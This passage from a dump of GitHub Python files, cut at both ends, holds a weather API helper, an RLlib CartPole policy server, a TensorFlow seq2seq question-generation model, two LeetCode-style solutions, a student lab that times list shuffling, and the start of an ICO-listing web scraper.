\"http://api.openweathermap.org/geo/1.0/direct\"\n response = requests.get(geocoding_url, params=geocoding_params)\n\n content = response.json()\n\n try:\n latitude = content[0][\"lat\"]\n longitude = content[0][\"lon\"]\n except (KeyError, IndexError):\n return None\n\n weather_url = \"https://api.openweathermap.org/data/2.5/weather\"\n\n weather_params = {\n \"lat\": latitude,\n \"lon\": longitude,\n \"appid\": OPEN_WEATHER_API_KEY,\n \"units\": \"imperial\",\n }\n\n response = requests.get(weather_url, params=weather_params)\n content = response.json()\n\n try:\n description = content[\"weather\"][0][\"description\"]\n temp = content[\"main\"][\"temp\"]\n except 
(KeyError, IndexError):\n return None\n\n return {\"description\": description, \"temp\": temp}\n","repo_name":"Killianjyk/conference-app","sub_path":"monolith/events/acls.py","file_name":"acls.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31861495529","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\"\"\"Example of running a policy server. Copy this file for your use case.\n\nTo try this out, in two separate shells run:\n $ python cartpole_server.py\n $ python cartpole_client.py\n\"\"\"\n\nimport os\nfrom gym import spaces\nimport numpy as np\n\nimport ray\nfrom ray.rllib.agents.dqn import DQNAgent\nfrom ray.rllib.env.serving_env import ServingEnv\nfrom ray.rllib.utils.policy_server import PolicyServer\nfrom ray.tune.logger import pretty_print\nfrom ray.tune.registry import register_env\n\nSERVER_ADDRESS = \"localhost\"\nSERVER_PORT = 8900\nCHECKPOINT_FILE = \"last_checkpoint.out\"\n\n\nclass CartpoleServing(ServingEnv):\n def __init__(self):\n ServingEnv.__init__(\n self, spaces.Discrete(2),\n spaces.Box(low=-10, high=10, shape=(4, ), dtype=np.float32))\n\n def run(self):\n print(\"Starting policy server at {}:{}\".format(SERVER_ADDRESS,\n SERVER_PORT))\n server = PolicyServer(self, SERVER_ADDRESS, SERVER_PORT)\n server.serve_forever()\n\n\nif __name__ == \"__main__\":\n ray.init()\n register_env(\"srv\", lambda _: CartpoleServing())\n\n # We use DQN since it supports off-policy actions, but you can choose and\n # configure any agent.\n dqn = DQNAgent(\n env=\"srv\",\n config={\n # Use a single process to avoid needing to set up a load balancer\n \"num_workers\": 0,\n # Configure the agent to run short iterations for debugging\n \"exploration_fraction\": 0.01,\n \"learning_starts\": 100,\n \"timesteps_per_iteration\": 200,\n })\n\n # Attempt to restore from checkpoint if possible.\n if os.path.exists(CHECKPOINT_FILE):\n checkpoint_path = open(CHECKPOINT_FILE).read()\n print(\"Restoring from checkpoint path\", checkpoint_path)\n dqn.restore(checkpoint_path)\n\n # Serving and training loop\n while True:\n print(pretty_print(dqn.train()))\n checkpoint_path = dqn.save()\n print(\"Last checkpoint\", checkpoint_path)\n with open(CHECKPOINT_FILE, \"w\") as f:\n f.write(checkpoint_path)\n","repo_name":"llan-ml/tesp","sub_path":"ray/rllib/examples/serving/cartpole_server.py","file_name":"cartpole_server.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"18"} +{"seq_id":"36362056609","text":"\"\"\"\nSimple seq2seq architecture for testing.\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib.rnn import GRUCell as GRU\nfrom tensorflow.contrib.cudnn_rnn import CudnnGRU\nimport time\nimport os\nimport logging\nfrom tqdm import trange\nfrom model.seq2seq_model_helpers import encoder_layer,\\\n bidirectional_encoder_layer, \\\n decoder_layer\nfrom utils.Helpers import batch_splitter,\\\n SYMB_BEGIN,\\\n SYMB_END\nfrom nltk.tokenize.moses import MosesDetokenizer\n\n\n\nclass Seq2Seq:\n def __init__(self, n_layers, dictionaries, vocab_size, n_hidden_encoder,\n n_hidden_decoder, embed_dim, train_emb, answer_injection, batch_size,\n use_bi_encoder, use_attention, use_copy_mechanism, max_parallel_dec,\n gen_vocab_size, use_cudnn_gru):\n # Input variables\n self.n_hidden_encoder = n_hidden_encoder # Number of hidden 
units in encoder\n self.n_hidden_decoder = n_hidden_decoder # Number of hidden units in decoder\n self.n_layers = n_layers # The number of layers in encoder and decoder\n self.embed_dim = embed_dim # The size of the initial embedding vectors (e.g. GloVe)\n self.train_emb = train_emb # Bool: train embeddings or not\n self.batch_size = batch_size # Max. batch size\n\n self.word_dictionary = dictionaries[0] # The word dictionary, used in accuracy\n self.vocab_size = vocab_size # Size of the word vocabulary (unique word tokens)\n self.gen_vocab_size = gen_vocab_size # Vocab size for copy mechanism\n self.symbol_begin = self.word_dictionary[SYMB_BEGIN] # Integer of start of sequence mark\n self.symbol_end = self.word_dictionary[SYMB_END] # Integer of start of sequence mark\n self.answer_injection = answer_injection\n self.use_bi_encoder = use_bi_encoder\n self.use_attention = use_attention\n self.use_copy_mechanism = use_copy_mechanism\n self.use_cudnn_gru = use_cudnn_gru\n self.max_parallel_dec = max_parallel_dec\n\n # If a bidirectional encoder is used, then make sure the decoder has twice the units\n # to match the concatenated encoder state size (which is 2 * n_hidden_encoder)\n if self.use_bi_encoder:\n self.n_hidden_decoder *= 2\n\n # Graph initialization\n # See their explanation below in the build_graph() method\n self.document = None\n self.query = None\n self.target_query = None\n self.answer = None\n self.answer_mask = None\n self.document_mask = None\n self.query_mask = None\n self.learning_rate = None\n self.keep_prob = None\n self.prediction = None\n self.test = None\n self.updates = None\n # Accuracy and Loss measures\n self.loss = None # The categorical cross-entropy loss\n self.perplexity = None # The per-word perplexity (e^(seq_loss_by_example))\n\n # Tensorboard variables\n # Used to report accuracy and loss values to tensorboard during training/validation\n\n self.loss_summ = None\n self.perplexity_summ = None\n self.merged_summary = None\n\n def build_graph(self, grad_clip, embed_init, seed, max_doc_len, max_qry_len):\n # ================================================================================================\n # DEFINING GRAPH PLACEHOLDERS\n # ================================================================================================\n\n # Placeholder for integer representations of the document and query tokens.\n # These are tensors of shape [batch_size, max_length] where max_length is the length of the longest\n # document or query in the current batch.\n self.document = tf.placeholder(tf.int32, [None, None], name=\"document\") # Document words\n self.query = tf.placeholder(tf.int32, [None, None], name=\"query\") # Query words\n # Define the target query sequence, which is the same as the query but shifted:\n # Query: [SYMBOL_BEGIN, 1, 2, 3, SYMBOL_END] Target Query: [1, 2, 3, SYMBOL_END, SYMBOL_PAD]\n self.target_query = tf.placeholder(tf.int32, [None, None], name='target_query')\n # Placeholder for the ground truth answer's index in the document.\n # A tensor of shape [batch_size, 2]\n # The values refer to the answer's index in the document. 
Can be either the index among\n # tokens or chars.\n #\n # [[answer_start_0, answer_end_0]\n # [answer_start_1, answer_end_1]\n # [............................]\n # [answer_start_n, answer_end_n]] - where batch_size = n\n #\n self.answer = tf.placeholder(\n tf.int32, [None, 2], name=\"answer\")\n\n # Placeholder for document and query masks.\n # These are the same as the document and query placeholders above, except that they are binary,\n # having 0's where there is no token, and 1 where there is.\n # Example:\n # Assuming max_doc_len = 4 and batch_size = 3\n # <---4----> <---4---->\n # self.document = [[2, 5, 4, 7] ----> self.document_mask = [[1, 1, 1, 1] <-- document 1\n # [3, 2, 6, 0] [1, 1, 1, 0] <-- document 2\n # [2, 1, 0, 0]] [1, 1, 0, 0]] <-- document 3\n #\n # The masks are used to calculate the sequence length of each text sample going into\n # the bi-directional RNN.\n self.document_mask = tf.placeholder(\n tf.int32, [None, None], name=\"document_mask\")\n self.query_mask = tf.placeholder(\n tf.int32, [None, None], name=\"query_mask\")\n self.answer_mask = tf.placeholder(\n tf.float32, [None, None], name=\"answer_mask\")\n\n # Model parameters\n # Initial learning rate\n self.learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\")\n # Keep probability = 1 - dropout probability\n self.keep_prob = tf.placeholder(tf.float32, name=\"keep_prob\")\n\n # =================================================================================================\n # BUILDING THE GRAPH\n # =================================================================================================\n\n # Embedding the document and query words.\n # For each word (represented by an integer) we look up the vector representation in either\n # a pre-trained word-vector dictionary or one that is initialized now.\n # See figure 1. in the paper (link at the top of this file). These embeddings are the leftmost\n # horizontal arrows in the figure going into the boxes named 'Embed'. Documents are blue, while the query\n # is green in the figure.\n # By default the word-vectors used are GloVe (Global Vectors) see the paper:\n # \"GloVe: Global Vectors for Word Representation\" by Pennington et al. 
2014\n # Link to code, demo, paper: https://nlp.stanford.edu/projects/glove/\n #\n # This process means the documents go from 2 to 3 dimensional tensors:\n # before: [batch_size, max_document_length] -->\n # after: [batch_size, max_document_length, embedding_dimensions]\n #\n # The word-vectors are shaped [vocabulary_size, embedding_dimension]\n # so there is a word-vector for each unique word in the vocabulary\n #\n # EXAMPLE, assuming that:\n # batch_size = 2, max_document_length = 3, embedding_dim = 2, vocabulary_size = 3\n # <- 2-> <---3--->\n # word_vectors = [[1, 2] <- word 1 document = [[0, 1, 0] <- document 1\n # [3, 4] <- word 2 [1, 2, 0]] <- document 2\n # [5, 6]] <- word 3\n #\n # Then the document embeddings will be:\n # <----------3----------->\n # <- 2-> <- 2-> <- 2->\n # document_embed = [[[1, 2], [3, 4], [1, 2]] <- document 1\n # [[3, 4], [5, 6], [1, 2]]] <- document 2\n #\n\n # Creating the variable for the word_vectors\n # Embeddings are not supported on GPU, so placing on CPU to save memory\n with tf.device(\"/cpu:0\"):\n if embed_init is None: # If there are no pre-trained word vectors\n word_vectors = tf.get_variable(\n \"word_vectors\", [self.vocab_size, self.embed_dim],\n initializer=tf.glorot_normal_initializer(seed, tf.float32),\n trainable=self.train_emb)\n else: # Else, we use the pre-trained word-vectors\n word_vectors = tf.Variable(embed_init, trainable=self.train_emb,\n name=\"word_vectors\")\n\n # Embedding the document and query in the above word_vectors\n document_embedding = tf.nn.embedding_lookup(\n word_vectors, self.document, name=\"document_embedding\")\n query_embedding = tf.nn.embedding_lookup(\n word_vectors, self.query, name=\"query_embedding\")\n\n # # Assert embedding shapes are [None, max_length, embedding_dimensions]\n # assert document_embedding.shape.as_list() == [None, max_doc_len, self.embed_dim],\\\n # \"Expected document embedding shape [None, {}, {}] but got {}\".format(\n # max_doc_len, self.embed_dim, document_embedding.shape)\n # assert query_embedding.shape.as_list() == [None, max_qry_len, self.embed_dim],\\\n # \"Expected document embedding shape [None, {}, {}] but got {}\".format(\n # max_doc_len, self.embed_dim, query_embedding.shape)\n\n # Concatenating the answer mask with the document embedding\n if self.answer_injection:\n answer_mask_expanded = tf.expand_dims(self.answer_mask, axis=2)\n document_embedding = tf.concat([document_embedding, answer_mask_expanded], axis=2)\n\n # Assert document embedding (after answer_mask concatenation) shapes are:\n # # [None, max_length, embedding_dimensions]\n # assert document_embedding.shape.as_list() == [None, max_doc_len, self.embed_dim+1], \\\n # \"Expected document embedding shape [None, {}, {}] but got {}\".format(\n # max_doc_len, self.embed_dim+1, document_embedding.shape)\n\n # -----------------------------------------\n # Encoder Layer\n # -----------------------------------------\n rnn_cell = GRU\n\n # Pass the document to the encoder layer (either bidirectional or unidirectional)\n if self.use_bi_encoder:\n encoder_output, encoder_states = \\\n bidirectional_encoder_layer(rnn_cell, self.n_layers, self.document_mask,\n document_embedding, self.n_hidden_encoder,\n max_doc_len, self.keep_prob)\n else: # Use unidirectional encoder\n encoder_output, encoder_states = \\\n encoder_layer(rnn_cell, self.n_layers, self.document_mask, document_embedding,\n self.n_hidden_encoder, max_doc_len, self.keep_prob)\n\n current_batch_size = tf.to_int32(tf.shape(self.query)[0])\n\n logits_training, 
logits_inference = decoder_layer(encoder_states, encoder_output,\n query_embedding, self.query_mask,\n self.document,\n self.document_mask, word_vectors,\n rnn_cell,\n max_qry_len, self.vocab_size,\n self.gen_vocab_size,\n self.n_layers, self.n_hidden_decoder,\n self.keep_prob, self.use_attention,\n self.use_copy_mechanism, self.symbol_begin,\n self.symbol_end, current_batch_size,\n self.max_parallel_dec)\n\n # Getting the output from the decoder layer\n # RNN output is the full logit vector for each timestep\n # shape [batch_size, sequence_length, vocabulary_size] TODO: ASSERT THIS\n # sample_id is the argmax of the logit for each timestep,\n # that is, an index which can be passed\n # through an inverse word dictionary to see the predicted/generated words.\n # shape [batch_size, sequence_length] TODO: ASSERT THIS TOO\n logits_training = tf.identity(logits_training.rnn_output, name=\"logits\")\n sample_ids_inference = tf.identity(logits_inference.sample_id, name=\"predictions\")\n self.prediction = sample_ids_inference\n\n # -----------\n # LOSS\n # -----------\n\n # Cast and query mask as float32 for loss calculation\n query_mask_float = tf.cast(self.query_mask, dtype=tf.float32)\n\n # Slice target_query and query_mask to match first two dimensions with logits\n # Get the current size of logits' second dimension (seq. length)\n logits_shape_1 = tf.to_int32(tf.shape(logits_training)[1])\n # Perform the slice\n query_mask_sliced = tf.slice(query_mask_float, [0, 0], [current_batch_size, logits_shape_1])\n query_sliced = tf.slice(self.target_query, [0, 0], [current_batch_size, logits_shape_1])\n\n with tf.name_scope(\"seq2seq_loss\"):\n self.loss = tf.contrib.seq2seq.sequence_loss(logits_training,\n query_sliced,\n query_mask_sliced)\n\n self.perplexity = tf.exp(self.loss)\n\n # Define Optimizer\n vars_list = tf.trainable_variables()\n optimizer = tf.train.AdamOptimizer(self.learning_rate)\n\n # Gradient clipping\n grads, _ = tf.clip_by_global_norm(\n tf.gradients(self.loss, vars_list), grad_clip)\n self.updates = optimizer.apply_gradients(zip(grads, vars_list))\n # Save variables\n self.save_vars()\n\n # Tensorboard summaries\n self.loss_summ = tf.summary.scalar('seq2seq_loss', self.loss)\n self.perplexity_summ = tf.summary.scalar('seq2seq_perplexity', self.perplexity)\n self.merged_summary = tf.summary.merge_all()\n\n def save_vars(self):\n \"\"\"\n for restoring model\n \"\"\"\n tf.add_to_collection('document', self.document)\n tf.add_to_collection('document_mask', self.document_mask)\n tf.add_to_collection('query', self.query)\n tf.add_to_collection('target_query', self.target_query)\n tf.add_to_collection('query_mask', self.query_mask)\n tf.add_to_collection('answer', self.answer)\n tf.add_to_collection('answer_mask', self.answer_mask)\n tf.add_to_collection('keep_prob', self.keep_prob)\n tf.add_to_collection('loss', self.loss)\n tf.add_to_collection('perplexity', self.perplexity)\n tf.add_to_collection('prediction', self.prediction)\n tf.add_to_collection('updates', self.updates)\n tf.add_to_collection('learning_rate', self.learning_rate)\n\n def train(self, sess, training_data, dropout, learning_rate, iteration, writer, epoch, max_it):\n \"\"\"\n Performs one training iteration with input tuple of training data.\n \"\"\"\n document_array, document_character_array, query_array, query_character_array,\\\n answer_array, document_mask_array, query_mask_array, answer_mask_array,\\\n type_character_array, type_character_mask, target_query_array, filenames = training_data\n\n feed_dict = 
{self.document: document_array, self.query: query_array,\n self.target_query: target_query_array,\n self.answer: answer_array, self.document_mask: document_mask_array,\n self.query_mask: query_mask_array, self.keep_prob: 1 - dropout,\n self.learning_rate: learning_rate}\n\n # Feature marking the answer words in the document\n if self.answer_injection:\n feed_dict[self.answer_mask] = answer_mask_array\n\n if iteration % 50 == 0: # Get updated summary for Tensorboard every Xth iteration\n loss, updates = \\\n sess.run([self.loss, self.updates], feed_dict)\n\n # writer.add_summary(merged_summ, (epoch * max_it + iteration))\n else: # Otherwise, get regular updates\n # run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n # run_metadata = tf.RunMetadata()\n run_options = tf.RunOptions(report_tensor_allocations_upon_oom=True)\n loss, updates, summaries = \\\n sess.run([self.loss, self.updates, self.merged_summary], feed_dict,\n options=run_options)\n # writer.add_run_metadata(run_metadata, \"step{}\".format(epoch*max_it+iteration))\n writer.add_summary(summaries, int(epoch*max_it+iteration))\n # return loss, f1_score, exact_match_accuracy, updates\n return loss, updates\n\n def validate(self, sess, valid_batch_loader,\n inverse_word_dictionary,\n iteration=None, writer=None,\n epoch=None, max_it=None):\n \"\"\"\n Validate/Test the model\n \"\"\"\n it = loss = 0\n\n # Text predictions for inference\n prediction_text = []\n\n tr = trange(\n len(valid_batch_loader),\n desc=\"Loss: {:.3f}, Perplexity: {:.3f}\".format(0.0, 0.0, 0.0),\n leave=False,\n ascii=True)\n start_time = time.time()\n for validation_data in valid_batch_loader:\n it += 1\n total_seq_length = np.sum(validation_data[5])\n\n if total_seq_length > 8700:\n batch_split_1, batch_split_2 = batch_splitter(validation_data)\n validation_data = [batch_split_1, batch_split_2]\n else:\n validation_data = [validation_data] # Wrap it in list for loop\n\n for validation_batch in validation_data:\n document_array, document_character_array, query_array, query_character_array,\\\n answer_array, document_mask_array, query_mask_array, answer_mask_array,\\\n type_character_array, type_character_mask, target_query_array, filenames = validation_batch\n\n feed_dict = {self.document: document_array, self.query: query_array,\n self.target_query: target_query_array,\n self.answer: answer_array, self.document_mask: document_mask_array,\n self.query_mask: query_mask_array, self.keep_prob: 1.,\n self.learning_rate: 0.}\n\n # Feature marking the answer words in the document\n if self.answer_injection:\n feed_dict[self.answer_mask] = answer_mask_array\n\n try:\n loss_, prediction = \\\n sess.run([self.loss, self.prediction], feed_dict)\n except tf.errors.ResourceExhaustedError:\n print(\"GPU out of memory during validation.\"\n \" Total sequence length in batch was {},\"\n \"Skipping batch...\".format(total_seq_length))\n continue\n\n # Run current document, query and generated query through inverse word-dictionary\n # for printing at end of validation\n current_prediction = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in prediction]\n current_document = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in document_array]\n current_target_query = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in target_query_array]\n current_query = [[inverse_word_dictionary[word_value] for word_value in row]\n for row in query_array]\n\n # print(\"Answer array: {}\".format(answer_array))\n # 
print(\"Document: {}\".format(current_document))\n current_answer = []\n for index, row in enumerate(current_document):\n answer_start = answer_array[index, 0]\n answer_end = answer_array[index, 1]\n current_answer.append(row[answer_start:answer_end+1])\n\n prediction_text.append([current_document, current_target_query,\n current_query, current_prediction, current_answer])\n\n loss += loss_\n current_perplexity = np.exp(loss_)\n tr.set_description(\"Loss: {:.3f}, Perplexity: {:.3f}\".\n format(loss_, current_perplexity))\n tr.update()\n tr.close()\n\n loss /= it\n perplexity = np.exp(loss)\n time_spent = (time.time() - start_time) / 60\n statement = \"loss: {:.3f}, perplexity: {:.3f} time: {:.1f}(m)\" \\\n .format(loss, perplexity, time_spent)\n logging.info(statement)\n # Logging example document, ground truth question and generated question\n detokenizer = MosesDetokenizer()\n\n # Print the first 10% of predictions for the validation set\n for i in range(int(len(prediction_text)/10)):\n doc = prediction_text[i][0][0]\n doc = [word for word in doc if word != \"@pad\"]\n # tgt_qry = prediction_text[i][1][0]\n # tgt_qry = [word for word in tgt_qry if word != \"@pad\"]\n qry = prediction_text[i][2][0]\n qry = [word for word in qry if word != \"@pad\"]\n gen_qry = prediction_text[i][3][0]\n ans = prediction_text[i][4][0]\n doc = detokenizer.detokenize(doc, return_str=True)\n # tgt_qry = detokenizer.detokenize(tgt_qry, return_str=True)\n qry = detokenizer.detokenize(qry, return_str=True)\n gen_qry = detokenizer.detokenize(gen_qry, return_str=True)\n ans = detokenizer.detokenize(ans, return_str=True)\n\n logging.info(\"Document: {}\".format(doc))\n # logging.info(\"Target Query: {}\".format(tgt_qry))\n logging.info(\"Answer: {}\".format(ans))\n logging.info(\"Query: {}\".format(qry))\n logging.info(\"Generated query: {}\\n\".format(gen_qry))\n\n return loss, perplexity\n\n def predict(self, sess, batch_loader, unlabeled=True):\n\n output = []\n tr = trange(\n len(batch_loader), leave=False, ascii=True)\n for samples in batch_loader:\n document_array, document_character_array, query_array, query_character_array,\\\n answer_array, document_mask_array, query_mask_array, answer_mask_array,\\\n type_character_array, type_character_mask, target_query_array, filenames = samples\n\n feed_dict = {self.document: document_array, self.query: query_array,\n self.target_query: target_query_array,\n self.answer: answer_array, self.document_mask: document_mask_array,\n self.query_mask: query_mask_array,\n self.keep_prob: 1., self.learning_rate: 0.}\n\n # Feature marking the answer words in the document\n if self.answer_injection:\n feed_dict[self.answer_mask] = answer_mask_array\n\n document, query, answer, prediction = \\\n sess.run([self.document, self.query, self.answer, self.prediction], feed_dict)\n if unlabeled: # Only return the prediction and the respective question IDs\n output.append((prediction, filenames))\n else:\n output.append((document, query, answer, prediction, filenames))\n\n tr.update()\n tr.close()\n\n return output\n\n def restore(self, sess, checkpoint_dir, model_name, epoch):\n \"\"\"\n restore model\n \"\"\"\n model = '{}_epoch{}.ckpt'.format(model_name, epoch)\n checkpoint_path = os.path.join(checkpoint_dir,\n model)\n\n print(\"\\nRestoring model from: {}\\n\".format(checkpoint_path))\n\n loader = tf.train.import_meta_graph(checkpoint_path + '.meta')\n loader.restore(sess, checkpoint_path)\n logging.info(\"model restored from {}\".format(checkpoint_path))\n # restore variables from 
checkpoint\n        self.document = tf.get_collection('document')[0]\n        self.document_mask = tf.get_collection('document_mask')[0]\n        self.target_query = tf.get_collection('target_query')[0]\n        self.query = tf.get_collection('query')[0]\n        self.query_mask = tf.get_collection('query_mask')[0]\n        self.answer = tf.get_collection('answer')[0]\n        self.answer_mask = tf.get_collection('answer_mask')[0]\n        self.keep_prob = tf.get_collection('keep_prob')[0]\n        self.loss = tf.get_collection('loss')[0]\n        self.perplexity = tf.get_collection('perplexity')[0]\n        self.prediction = tf.get_collection('prediction')[0]\n        self.updates = tf.get_collection('updates')[0]\n        self.learning_rate = tf.get_collection('learning_rate')[0]\n\n    def save(self, sess, saver, checkpoint_dir, model_name, epoch):\n        checkpoint_path = os.path.join(checkpoint_dir, '{}_epoch{}.ckpt'.format(model_name, epoch))\n        saver.save(sess, checkpoint_path)\n        logging.info(\"model saved to {}\".format(checkpoint_path))","repo_name":"peters92/ssqa","sub_path":"src/model/generative_domain_adaptive_net/model/seq2seq_model.py","file_name":"seq2seq_model.py","file_ext":"py","file_size_in_byte":26319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"35922806341","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n# Imports needed to run this outside the LeetCode environment\nimport collections\nfrom typing import List, Optional\n\nclass Solution:\n    def rightSideView(self, root: Optional[TreeNode]) -> List[int]:\n        res = []\n        q = collections.deque([root])\n        \n        while q:\n            rightSide = None #to keep track of the rightmost node on this level\n            \n            for i in range(len(q)):\n                node = q.popleft()\n                if node:\n                    rightSide = node #update rightSide with this node; the right side will be the last one inserted\n                    q.append(node.left) #add the left child first, then the right\n                    q.append(node.right)\n\n            if rightSide: #if rightSide is not None\n                res.append(rightSide.val)\n        return res\n    \n    #Time complexity: O(N) since one has to visit each node.\n\n    #Space complexity: O(D) to keep the queue, where D is the tree's diameter (its maximum width)","repo_name":"SanketRevadigar/LeetCode","sub_path":"199-binary-tree-right-side-view/199-binary-tree-right-side-view.py","file_name":"199-binary-tree-right-side-view.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13805077586","text":"\"\"\"\r\nAuthor : Johanna & Gwenaël\r\nDate : 21/09/2020\r\nVersion : 1\r\nDescription: Lab 5 (Atelier 5)\r\n\"\"\"\r\n\r\nimport time\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef sort_list(list_elt:list)->list:\r\n    liste:list=list_elt[:]\r\n    for j in liste :\r\n        for i in range(1,len(liste)):\r\n            if(liste[i]<liste[i-1]):\r\n                liste[i-1], liste[i] = liste[i], liste[i-1]\r\n    return liste\r\n\r\n\r\n# NOTE: reconstructed (assumed) hand-written shuffle, timed against random.shuffle below\r\ndef mix_list(list_elt:list)->list:\r\n    liste:list=list_elt[:]\r\n    for i in range(len(liste)):\r\n        j = random.randrange(len(liste))\r\n        liste[i], liste[j] = liste[j], liste[i]\r\n    return liste\r\n\r\n\r\ndef perf_mix(func1, func2, lst_size: list, nbr_exec: int = 10) -> (list, list):\r\n    \"\"\"\r\n    Measures the performance of the functions given as parameters\r\n\r\n    :param func1: first function to test\r\n    :param func2: second function to test\r\n    :param lst_size: list of the list sizes used as parameters\r\n    :param nbr_exec: number of executions used for the averages (default 10)\r\n\r\n    :return: (perf1, perf2)\r\n    \"\"\"\r\n    perfs_f1 = []\r\n    perfs_f2 = []\r\n\r\n    for size in lst_size:\r\n        # Measure perf for func1\r\n        start_time = time.perf_counter()\r\n        lst = [i for i in range(size)]\r\n        for i in range(nbr_exec):\r\n            func1(lst)\r\n\r\n        stop_time = time.perf_counter()\r\n        perfs_f1.append((stop_time - start_time) / nbr_exec)\r\n\r\n        # Measure perf for func2\r\n        start_time = time.perf_counter()\r\n        for i in range(nbr_exec):\r\n            func2(lst)\r\n\r\n        stop_time = time.perf_counter()\r\n        
perfs_f2.append((stop_time - start_time) / nbr_exec)\r\n\r\n    return (perfs_f1, perfs_f2)\r\n\r\n\r\ndef draw_graph(lst_size: list, perfs: list):\r\n    \"\"\"\r\n    Draws a matplotlib graph of the perfs as a function of lst_size\r\n\r\n    :param lst_size: x-axis values\r\n    :param perfs: performances of the functions\r\n    \"\"\"\r\n\r\n    fig, ax = plt.subplots()\r\n    ax.plot(lst_size, perfs[0], label=\"Function 1\")\r\n    ax.plot(lst_size, perfs[1], label=\"Function 2\")\r\n    ax.set(xlabel=\"List size\", ylabel=\"Average execution time\", title=\"Performance graph\")\r\n    ax.legend(loc=\"upper center\")\r\n    plt.show()\r\n\r\n\r\nsizes = [5, 10, 20, 40, 80, 100, 500, 1000]\r\nperfs = perf_mix(mix_list, random.shuffle, sizes, 10)\r\ndraw_graph(sizes, perfs)","repo_name":"johakespeare/infoL3","sub_path":"PycharmProjects/atelier5/exercice6.py","file_name":"exercice6.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29081636001","text":"def word_break(s, word_dict):\n    # dp[i] is True when the prefix s[:i] can be segmented into words from word_dict\n    n = len(s)\n    dp = [False] * (n + 1)\n    dp[0] = True\n\n    for i in range(1, n + 1):\n        for j in range(i):\n            # extend a segmentable prefix s[:j] with the dictionary word s[j:i]\n            if dp[j] and s[j:i] in word_dict:\n                dp[i] = True\n                break\n\n    return dp[n]\n","repo_name":"Grodd91/Python","sub_path":"Algorithms/Word Break/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74989570601","text":"from bs4 import BeautifulSoup\nimport urllib3\nimport requests\nimport pprint\n\ndef hasNumbers(inputString):\n\treturn any(char.isdigit() for char in inputString)\n\n# Data Structure:\n# This one takes a while to run\n# {\n# \tname: \"ICO NAME\",\n# \tdescription: \"description\",\n# \tcategory: \"ico stuff\"\n# \twebsite: \"http.website.com\",\n# \twhitepaper: \".pdf\",\n# \ttwitter: \"twitter.com\",\n# \ttelegram: \"t.me\",\n# \tslack: \"slack\",\n# \tteam: [],\n# \tamt_raised = \"232323\",\n# \tsoft_cap =\"2342\",\n# \thard_cap =\"232323\",\n# \tpre_sale_date =\"234234\",\n# \ttoken_sale_date=\"324242\",\n# \ttotal_supply =\"2342442\",\n# \tcountry =\"\"\n# }\n\n\npp = pprint.PrettyPrinter(indent=4)\n\ndef get_icos():\n\trequests.packages.urllib3.disable_warnings()\n\n\tr = requests.get('https://icobench.com/icos?status=upcoming', verify=False)\n\n\tsoup = BeautifulSoup(r.text, 'html.parser')\n\n\tlinks =[]\n\tnames = soup.find_all(\"a\", \"name\")\n\tfor name in names:\n\t\tlinks.append(\"https://icobench.com\" + name['href'])\n\n\twhile soup.find(\"a\", \"next\"):\n\n\t\tlink = \"https://icobench.com\" + soup.find(\"a\", \"next\")['href']\n\t\tr = requests.get(link, verify=False)\n\t\tsoup = BeautifulSoup(r.text, 'html.parser')\n\t\tnames = soup.find_all(\"a\", \"name\")\n\t\tfor name in names:\n\t\t\tlinks.append(\"https://icobench.com\" + name['href'])\n\n\tupcoming = []\n\tfor link in links:\n\t\tr2 = requests.get(link, verify=False)\n\t\tsoup2 = BeautifulSoup(r2.text, 'html.parser')\n\t\tname = soup2.find(\"div\", \"name\").h1.text\n\t\tdesc = soup2.find(\"div\", \"ico_information\").p.text\n\t\tcategory = \"\"\n\t\tcategories = soup2.find('div', \"categories\").find_all(\"a\")\n\t\tfor categ in categories:\n\t\t\tcategory = category + categ.text + \" \"\n\n\t\tfinancial_data = soup2.find(\"div\", \"financial_data\")\n\t\tdate = \"\"\n\t\tif financial_data.find(\"small\"):\n\t\t\tdate = financial_data.find(\"small\").text\n\t\telse:\n\t\t\tdate = \"TBD\"\n\n\t\tsoftcap = 
